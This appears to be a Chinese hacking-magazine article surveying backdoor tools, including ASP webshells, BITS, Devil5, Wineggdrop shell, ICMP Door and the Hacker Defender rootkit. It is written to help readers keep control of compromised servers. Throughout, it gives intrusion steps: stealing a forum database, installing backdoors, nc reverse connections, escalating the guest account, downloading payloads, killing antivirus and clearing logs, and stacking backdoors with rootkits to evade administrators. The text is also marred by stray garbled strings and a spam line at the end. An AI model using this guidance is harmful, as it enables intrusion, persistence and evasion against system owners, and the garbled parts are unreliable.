當前位置:網際電腦 > 文章中心 > 網絡技術 > 黑客防線 >后門程序技術知識全面深解 投稿指南

后門程序技術知識全面深解

什么是后門程序

  后門程序又稱特洛伊木馬,其用途在于潛伏在電腦中,從事搜集信息或便于黑客進入的動作。后程序和電腦病毒最大的差別,在于后門程序不一定有自我復制的動作,也就是后門程序不一定會“感染”其他電腦。

  后門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還 能挫敗系統上各種增強的安全設置。

  后門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還能挫敗系統上各種增強的安全設置。

  后門包括從簡單到奇特,有很多的類型。簡單的后門可能只是建立一個新的賬號,或者接管一個很少使用的賬號;復雜的后門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序,你當輸入特定的密碼時,你就能以管理員的權限來存取系統。

  后門能相互關聯,而且這個 技術被許多黑客所使用。例如,黑客可能使用密碼破解一個或多個賬號密碼,黑客可能會建立一個或多個賬號。一個黑客可以存取這個系統,黑客可能使用一些 技術或利用系統的某個漏洞來提升權限。黑客可能使用一些技術或利用系統的某個漏洞庭湖來提升權限。黑客可能會對系統的配置文件進行小部分的修改,以降低系統的防衛性能。也可能會安裝一個木馬程序,使系統打開一個安全漏洞,以利于黑客完全掌握系統。

  以上是在網絡上常見的對“后門”的解釋,其實我們可以用很簡單的一句話來概括它:后門就是留在計算機系統中,供某位特殊使用都通過某種特殊方式控制計算機系統的途徑!——很顯然,掌握好后門技術是每個網絡安全愛好者不可或缺的一項基本技能!它能讓你牢牢抓住肉雞,讓它永遠飛不出你的五指山!

  下文將以筆者從事網絡安全多年的工作經驗為基礎,給廣大的網絡初級安全愛好者講解一些網絡上常 用的后門的種類和使用方法以及技巧,希望大家能在最短的時間內學習到最好的技術,提升自己的網絡安全技術水平!

  后門的分類

  后門可以按照很多方式來分類,標準不同自然分類就不同,為了便于大家理解,我們從技術方面來考慮后門程序的分類方法:

  1.網頁后門

  此類后門程序一般都是服務器上正常 的web服務來構造自己的連接方式,比如現在非常流行的ASP、cgi腳本后門等。

  2。線程插入后門

  利用系統自身的某個服務或者線程,將后門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個后門技術。

  3擴展后門

  所謂的“擴展”,是指在功能上有大的提升,比普通的單一功能的后門有很強的使用性,這種后門本身就相當于一個小的安全工具包,能實現非常多的常駐見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫郭后門“隱蔽”的初衷,具體看法就看各位使用都的喜好了。

  4.c/s后門

  和傳統的木馬程序類似的控制方法,采用“客記端/服務端”的控制方式,通過某種特定的訪問方式來啟動后門進而控制服務器。

  5.root kit 6o f3H3B

  這個需要單獨說明,其實把它單獨列一個類在這里是不太恰當的,但是,root kit 的出現大大改變了后門程序的思維角度和使用理念,可以說一個好的root kit就是一個完全的系統殺手!后文我們講涉及到這方面,想念一定不會讓大家失望!

  上面是按照技術做的分類,除了這些方面,正向連接后門、反向連接后門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那么多了,我們看重的,只是功能! Oi-)G!12

  入侵法定————精品后門

  上面的“廢話”想念大家都看累了吧?好,下面我們來看看現在網絡中滸的后門究竟長什么模樣想學習網絡安全并想提高的朋友看清楚了哦,這可是讓你的肉雞逃不出你的五指山的大好途徑! 66 _}=`W/k

  1.網頁后門

  近段時間網絡上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網絡安全的重要性之后,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以后的歲月中存活的周期會越來越短,而從最近的趨勢來看,肢本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起卻本漏洞來,sql注入也開始成為各大安全站點首要關注熱點,而說到腳本、網頁后門當然就是不得不說的重頭戲了,現在國內入侵的主流趨勢是先利用某種腳本漏洞上傳腳本后門,然后瀏覽服務器內安裝和程序,找到提升權限的突破口,進而拿到服務器的系統權限。

  現在asp、CGI、PHP這三個腳本大類在網絡上的普遍運用帶來了腳本后門在這三方面的發展,下面我們一一道來:

  海陽頂端ASP木馬

  這是ASP腳本方面流傳非常廣的一個腳本后門了,在經過幾次大的改革后,推出了“海陽頂端ASP木馬XP版”、“海陽頂端ASP木馬紅粉佳人版”等功能強大、使用方便的后門,想念經常接解腳步本安全的朋友對這些都不會陌生。

  類型:網頁木馬

  使用范圍:支持ASP、WEB訪問

  使用難度:★☆☆☆☆

  危害程序:★★★☆☆

  查殺難度:★★★☆☆

  現在的服務器系統配置都相對安全,公開的系統漏洞存在的機會很少,于是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個服務器的頁面權限(比如利用論壇上傳達室類型未嚴格設置、SQL注入后獲得ASP系統的上傳權限、對已知物理路徑的服務器上傳特定程序),然后我們可以通過簡單的上傳ASP程序或者是直接復制海陽項端的代碼,然后通過WEB訪問這個程序,就能很方便地查閱服務器上的資料了,下面舉個簡單的便子(由于只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。

  運用舉便

  leadbbs2.77曾經風靡網絡,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的網絡管理員總是喜歡默認安裝,然后啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的數據庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然后登錄論壇,到管理界面將論壇的“聯系我們”、“幫助”等ASP文件替換成我們的海陽項端代碼,然后執行GUEST權限的CMD命令,方便的上傳/下載將定程序、遠程執行程序等,這樣一個隱藏的后門就建好了!取得服務器的SYSTEM權限就看大家自己的辦法了。

  一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友采取的方式是:先利用某個腳本漏洞上傳網頁后門,再通過海洋上傳另一個后門到隱蔽的路徑,然后通過最后上傳的后門來刪除第一次上傳的海洋,這樣后門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這里邊樣的后門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日志、論壇日志等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。

  腳本方面的后門還有CGI和PHP兩面三刀大類,使用原理都差不多,這里就不再多介紹,在黑防論壇也收錄了這三種后門,大家可以下載后自己研究。

  2.線程插入后門

  首先我們來簡單解釋一下什么是典型的"線程插入"后門:這種后門在運行時沒有進程,所有網絡操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火墻擁有“應用程序訪問權限”的功能,也不能對這樣的后門進行有效的警告和攔截,也就使對方的防火墻形同虛設了!這種后門是現在非常主流的一種,很讓防護的人頭疼,因為對它的查殺比較困難,這種后門本身的功能比較強大,是“居中家旅行、入侵攻擊”的必備品哦!

  這類的典范就是國內提倡網絡共享的小榕的BITS了,從它的推出以來,各類安全工具下載園地里BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。

類型:系統后門

  使用范圍:wind200/xp/2003

  隱蔽程序:★★★★☆

  使用難度:★★★☆☆

  查殺難度:★★★★☆

  BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另一種意義的典型的線程插入后門,有以下特點:進程管理器中看不到;平時沒有端口,只是在系統中充當臥底的角色;提供正向連接和反向連接兩種功能;僅適合用于windows 200/xp/2003。

  運用舉例

  首先我們用3389登錄上肉雞,確定你有SYSTEM的權限,將BITS.DLL拷貝到服務器上,執行CMD命令: 4#R BrA

  rundll32.exe bits.dll,install

  這樣就激活了BIST,程序用這個特征的字符來辨認使用者,也就相當于你的密碼了,然后卸載:rundll32.exe BITS.dll,Uninstall

  這是最簡單的使用,這個后門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:端口復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但并不了解它們,端口復用就是利用系統正常的TCP端口通訊和控制,比如80、139等,這樣的后門有個非常 大的好處就是非常 隱蔽,不用自己開端口也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另一個是反向連接,這個很常 見,也是后門中一個經典思路,因為從服務器上主動方問外邊是不被禁止的,很多很歷害的防火墻就怕這點!

  BITS的正向連接很簡單,大家可以參考它的README,這種方式在服務器沒有防火墻等措施的時候很管用,可以方便地連接,但是遇到有防火墻這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l

  在本地使用NC監聽(如:nc -l -p 1234)

  用NC連接目標主機的任何一個防火墻允許的TCP端口(80/139/445……)

  輸入激活命令::1.1.1.1:2222][email protected][rxell]:1.1.1.1:2222 ^q/hQ, 4

  目標主機的CMD將會出現NC監聽的端口2222,這樣就實現了繞過防火墻的功能了。

  devil5(魔鬼5號)

  類型:系統后門

  使用范圍:win200/xp/2003

  隱蔽程度:★★★★☆

  使用難度:★★☆☆☆

  危害程序:★★★★☆

  查殺難度:★★★☆☆

  同BITS一樣,Devil5也是線程插入式的后門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定制端口和需要插入的線程,適合對系統有一定了解的使用都使用,由于是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。

  運用舉例:

  道德使用它自帶的配置程序EDITDEVIL5.EXE對后門進行常規的配置,包括控制端口、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定制,一般設置成系統自帶的SVCHOST,然后運行后門就可以控制了。

  我們用TELNET連接上去,連接的格式是:TELNET *** 定制的端口,它和其他后門不同之處在于連接后沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了服務器和管賬戶,可以激活GUEST后再將GUEST加到管理員權限,記得每次執行命令后加上“>密碼”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服務器了。

  很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶端口通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定制,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。

  另外,PortLess BackDoor等工具也是此類的后門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。

  3.擴展后門

  所謂的擴展后門,在普通意義上理解,可以看成是將非常多的功能集成到了后門里,讓后門本身就可以實現很多功能,方便直接控制肉雞或者服務器,這類的后門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、端口開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。

  Wineggdroup shell j;

  類型:系統后門

  使用范圍:win2000/xp/2003

  隱蔽程度:★★★★☆

  使用難度:★★☆☆☆

  危害程度:★★★★☆

  查殺難度:★★★★☆

  這個后門是擴展后門中很有代表性的一個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);注冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)端口到程序關聯功能(fport);系統重啟,關電源,注銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端端口功能;端口重定向功能(多線程,并且可限制連接者IP);HTTP服務功能(多線程,并且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,http下載,刪除日志,系統信息,恢復常用關聯,枚舉系統賬戶等。

  當網絡上剛推出這個后門的時候,非常多的人用它來替換自己原來使用的后門,一時間各處贊揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和“后門”的原始定義是有出入的:一旦你需要實現越多的功能,那你的程序在執行、隱藏、穩定等方面就需要考慮非常多的問題,一個疏忽就會導致全盤皆敗,所以不建議將此后門用在需要非常隱蔽的地方。

  運用舉例

  在安裝后門前,需要使用它自帶的EditServer.exe程序對服務端進行非常詳細的配置,從10個具體配置中,包括了插入線程、密碼、IP登錄郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:

  Fport:列出進程到端口的列表,用于發現系統中運行程序所對應的端口,可以用來檢測常見的隱蔽的后門。

  Reboot:重啟系統,如果你上傳并運行了其他后門程序,并需要重啟機器以便讓后門正常工作,那使用這個命令吧! Uz

  Shell:得到一個Dos Shell,這個不多講了,直接得到服務器或者肉雞上的cmd shell。

  Pskill PID或程序名:用于殺掉特定的服務,比如殺毒軟件或者是防火墻。

  Execute程序:在后臺中執行程序,比如sniffer等。http://ip/文件名 保存文件名:下載程序,直接從網上down一個后門到服務器上。

  Installterm端口:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統后才生效,并可以自定義連接端口,比如不用3389而用其他端口。

  StopService/StartService:停止或者啟動某個系統服務,比如telnet。

  CleanEvent:刪除系統日志。

  Redirect:TCP數據轉發,這個功能是后門程序中非常出色的一個功能,可以通過某一端口的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!

  EnumService:列舉所有自動啟動的服務的資料,比如后門、木馬。

  RegEdit:進入注冊表操作模式,熟悉注冊表的使用者終于在后門中找到了福音! !

  Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。

  總體來講,Wineggdrop shell是后門程序中很出彩的一個,它經過作者幾次大規模的修改和升級,已經趨于穩定,功能的強大當然沒得說,但是由于功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell一段時間后就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。

  相對于Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那么全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得一個shell以外,只加入了一些重啟、關閉服務器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!

  Winshell和wolf這兩者都是國內早期頂尖的后門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款后門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。

  4、C/S后門

  傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在一定程度上避免了“萬能密碼”的情況出現,對后門私有化有一定的貢獻,這方面分類比較模糊,很多后門可以歸結到此類中,比如較巧妙的就是ICMP Door了

  類型:系統后門

  使用范圍:win2000/xp/2003 2Z6

  隱蔽程度:★★★★★

  使用難度:★★★☆☆

  危害程度:★★★★☆

  查殺難度:★★★★★

  這個后門利用ICMP通道進行通信,所以不開任何端口,只是利用系統本身的ICMP包進行控制安裝成系統服務后,開機自動運行,可以穿透很多防火墻——很明顯可以看出它的最大特點:不開任何端口~只通過ICMP控制!和上面任何一款后門程序相比,它的控制方式是很特殊的,連80端口都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!

  運用舉例

  這個后門其實用途最廣的地方在于突破網關后對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機并不是我們想到位的商業網絡進行入侵檢測,它的網絡內部并不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網絡安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多后門后,最后ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個后門。

  首先使用icmpsrv.exe -install參數進行后門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe -hkfx.exe]方式下載文件,保存在\\system32\目錄下,文件名為hkfx.exe,程序名前的“-”不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1?%

  這個后門是采用的c/s構架,必須要使用icmpsend才能激活服務器,但是他也有自己的先天不足:后門依靠ICMP進行通訊,現在的網絡,經過沖擊波的洗禮后,很少有服務器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制服務器不是一個好辦法,這也是我為什么用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧?!

5.root kit

  如果說上面的后門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什么樣是root kit呢?

  root kit出現于20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。

  很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問權限的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問權限的工具。通常,攻擊者通過遠程攻擊獲得root訪問權限,進入系統后,攻擊者會在侵入的主機中安裝root kit,然后他將經常通過root kit的后門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日志中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之后,攻擊者就會利用這些信息侵入其他系統。

  從*nix系統上遷移到windows系統下的root kit完全沿襲了這些“可怕”的功能!現在網絡上常見的root kit 是內核級后門軟件,用戶可以通過它隱藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的端口以及虛構可用磁盤窨。程序同時也在內存中偽裝它所做的改動,并且隱身地控制被隱藏進程。程序安裝隱藏后門,注冊隱藏系統服務并且安裝系統驅動。該后門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網絡管員非常頭疼!

  hacker defender

  類型:系統后門

  使用范圍:win200/xp/2003

  隱蔽程度:★★★★★

  使用難度:★★★★★

  危害程度:★★★★★

  查殺難度:★★★★★(呵呵,全部五星,因為它太“霸道”了)

  現在最新版本的hxdf是1.0.0,它是從國外傳過來的一個程序,包含兩個關鍵程序,里面的配置文件ini非常復雜,相信新手使用也是很困難的主要包括:[Hidden Table],[Root Processes],[HiddenServices],[Hidden RegKeys],[Hidden RegValues],[Startup Run],[Free Space],[Hidden pORTS],[Settings]。對功能就是隱藏文件(目錄)、隱藏進程、隱蔽服務、隱藏注冊鍵、隱藏注冊表鍵值、啟動程序、增加磁盤剩余空間、隱藏端口、后門設置,具體配置我們就不具體講解了,本期文章有詳細的介紹,我們說說它的特點(純粹個人觀點和經驗偏激的地方請大家海涵):

  (1)可以實現正常系統TCP端口的通訊,比如80等,這個功能在高級后門并不鮮見。

  (2)能得到簡單的系統SHELL,對入侵的老手來說這就夠了,多余的功能反而是累贅。

  (3)隱藏端口,如果你非要使用TCP的某一個非常規端口通訊,那使用這個功能吧,放心,別人發現不了。

  (4)隱藏后門的所有可找到東西!這個只能用一個字來形容:牛!比如隱藏文件、服務、注冊表鍵等功能,雖然我們說起來是一句話,想念識貨的朋友應該能發現這中間NB的地方!

  (5)史上最經典后門思維:配合其他擴展型后門使用,效果好得出乎你的意料!(這是后面的內容,我們馬上講到)。

  拋開其他不講,系統中安裝了這樣的root kit,你通過普通的查殺途徑根本檢測不到這個程序這點就非常值得我們利用了!試想:一個在你服務器上運行的后門,你連看都看不到它,別說查殺了!

  注:由于此后門危害太大,所以編輯特別在此掐掉作者一段篇幅,喜歡研究后門程序的朋友可以自己去研究,不過千萬注意不要誤運行了程序,查殺和清除是非常麻煩的事!直接重新安裝系統吧!

  經典后門思維

  現在很多朋友都在嘗試著開發一些自己的后門程序,他們企圖將非常多的功能加入到后門里恨不得一個后門就是一個操作系統!————很明顯,這樣是不對的!因為一個好的后門能實現非常單一的功能就夠了,它不是給你控制服務器的,而是給你在丟掉服務器控制方法的時候用來再次控制服務器的!所以,不要經常使用后門程序,當然也不要讓你的后門程序太在。 !5NcAo/3?’

  所有網絡安全工具都存在一個問題:隱藏!現在隨著廣大網友安全意識的提高,殺毒軟件、系統安全保護程序這些東西再不是“珍品”了,所以,就算你的后門程序能實現兩萬個功能,但是很容易就被殺毒軟件查殺的話,那也是白搭!換句話說:如果別人能很方便地看看進程、查查注冊表、看看端口就能查出系統有問題的話,你這個后門也就算不上好了!所以記住:隱藏才是最重要的! nt) 0Xt4!)

  很多朋友都喜歡使用某個功能很強大的后門程序來控制服務器,雖然很隱蔽,但一旦被殺,那他就只有望著服務哭了,其實只要我們稍微入寬思路就能解決這樣問題:嵌套使用互補的后門程序!這樣一旦一個后門暴露,另一個后門或者幾個后門依然在服務器——這點說起來很簡單,里面涉及到很多入侵中的經驗和方法,也涉入到root kit,后文我們會講到。

  對現在的網絡來說,如果一個網絡安全工具被公布,那么,在很短的時間內這個程序將被安全愛好者傳到網絡的任何一個地主!很明顯,這樣程序的存活期很短,不出幾天就被查殺了,所以本文列舉的所有程序都可以在網絡上找到(光盤上也有收錄),只是給大家提供一種比較好的思路和介紹,很多的后門是私人使用的。希望大家通過自己的學習也能寫出自己的優秀后門!

  通過上面的講解,相信大家對現在主流的后門程序都有了一事實上程度的了解,由于篇幅關系,本文不可以一個接一個實際的去講解用法和查殺,相信那樣讀者也讀著無聊,編輯審稿后也不能刊登了,具體的使用方法還得靠各位去摸索,下面我們說說經典后門的幾個個人體會。

  首先拍拍wtf的馬屁:這小子上次在黑防攻防實驗室上說的那句話:“兄弟們千萬不要拘泥于思維的定式,要知道安全最重要的就是思維的鍛煉和意識的培養,為了鍛煉大家的思維能力,友情提醒一下大家,我們在關卡中有很多的陷阱哦!千萬不要被表面的現象迷惑了!”不要小看了這句話,把這句話放到網絡入分和攻擊中,很多思維被發散出來,那是整體層次的提高!就拿我們的后門這方面來講,同樣是上面幾個功能強大的、隱蔽性好的后門,為什么你裝在肉雞上,不出三天就被查殺了?而別人裝一就一直用得好好的呢?這其中其實就是思維轉換的重要性的體現,下面我們將具體說說后門程序如何才能做的好的思維轉換和特點利用,先來看看普通網友的誤區:

  (1)普通安全愛好者都能通過常見的系統漏洞或者其他途徑入侵服務器,然后上去就是新建一個賬戶,直接添加到管理員權限,有點意識的還能在賬戶后面加一個$讓別人在CMD無法發現,然后再通過什么3389、23控制服務器,汗!這就是你看《黑客防線》的成績?《黑客防線》就這樣教你?難道所有管理員都是白癡?都不知道檢查系統最重要的賬戶?這樣的肉雞1天之內不丟都是個奇跡!

  (2)控制服務器->上傳后門_>開放特定端口->利用后門控制服務器,這中間通過findpass之類的經典工具得到管理員的密碼,給服務器開放3389等服務……同樣送給這樣的朋友一個字:暈!一個簡單得不能再簡單的netstat -an就能讓你的連接暴露無疑!那時候等著上法庭吧!

  (3)克隆系統內置賬戶并使用它來登錄服務器,這同樣是一個不可取的方法,根據我的經驗,這樣的肉雞肯定用不長!一兩面三刀周就飛掉了!

  上面只是一些比較低端的錯誤,相信大家在看了此文后不會現再犯這樣的錯誤,下面我們說說覺的比較安全的入侵后控制肉雞的辦法,如果我今天講的東西能有兩、三句能讓你在以后的入侵和安全防護中記住,那我倍感欣慰了!

  普通的入侵過程中,3389當然是大家最喜歡的控制方式,那為什么就只用3389來單純控制服務呂呢?當別人關掉3389后你怎么控制呢?所以需要后門,那安裝上普通的經典后門,為什么我的肉雞還是在很短的時間內飛掉呢?——請注意:任何一個系統管理員都不是白癡!不管你多“黑”,你遠程控制服務器總沒有別人物理接觸來得方便吧!逼不得已人家拔掉網線、格式化硬盤總能讓你不能控制了吧?!所以,后門的隱蔽性是非常重要的,要讓管理員無法發現系統中有后門就是非常重要的了!

  一個好的后門,能實現單一的功能就行了,一定不要經常使用你的后門程序來控制肉雞,這樣你想肉雞不飛都困難,比較好的方法是:

  3389/23+擴展型后門+rootkit

  這是到目前為止最經典的一種后門搭配方式,它幾方面的優點顯示而易見:對方發現不明ip連接的時候肯定會檢查系統問題,改system密碼,清理賬戶是不可避免了,進而管理員對系統的漏洞進行一次常規升級和檢測,補上最開始被入我們入侵的漏洞,這樣如果沒有后門,再進來就很難了。

  通常這樣情況下管理員會考慮系統中是不是存在后門,使用常見的殺毒軟件,安全程序來檢測系統,發現后門立即查殺,所以在這里后門的隱蔽性非常重要,一時被殺,game over!所以這里定要選擇一些比較難查殺或者是加過殼的后門,上面介紹的后門就是不錯的選擇,線程插入式是比較難被殺掉的。

  在這樣基礎上,如果他發現系統中某個程序總是在對網絡連接,或者是某個端口總是有人連接在上面,管理員肯定會想辦法kill掉這個程序,所以普通后門再隱藏得好也是會被查殺的,這也是大多數朋友的疑惑了,在這里就需要使用rootkit了!

  如果從系統級隱藏掉服務名、進、端口、注冊表值、啟動項目、程序名,那現在想信普通的殺毒程序、安全工具要查出系統中的后門程序是很難的!而這點,才是后門程序的精華所在:隱藏!這樣的功能,絕對不是某個后門程序單一使用能實現!而rootkit和上面介紹的一系列后門中的精品就是你最好的選擇!多嘗試,想念你一定找到這個經典搭配中的優勢的!退一萬步講,如果這樣控制的肉雞飛掉了,奉勸大家還是少玩為妙,免得惹火上身哦!

責任編輯:beecoadmin
上一篇:通過3389端口簡單檢測 下一篇:利用phpMyAdmin拿webshell
内蒙古十一选五遗漏号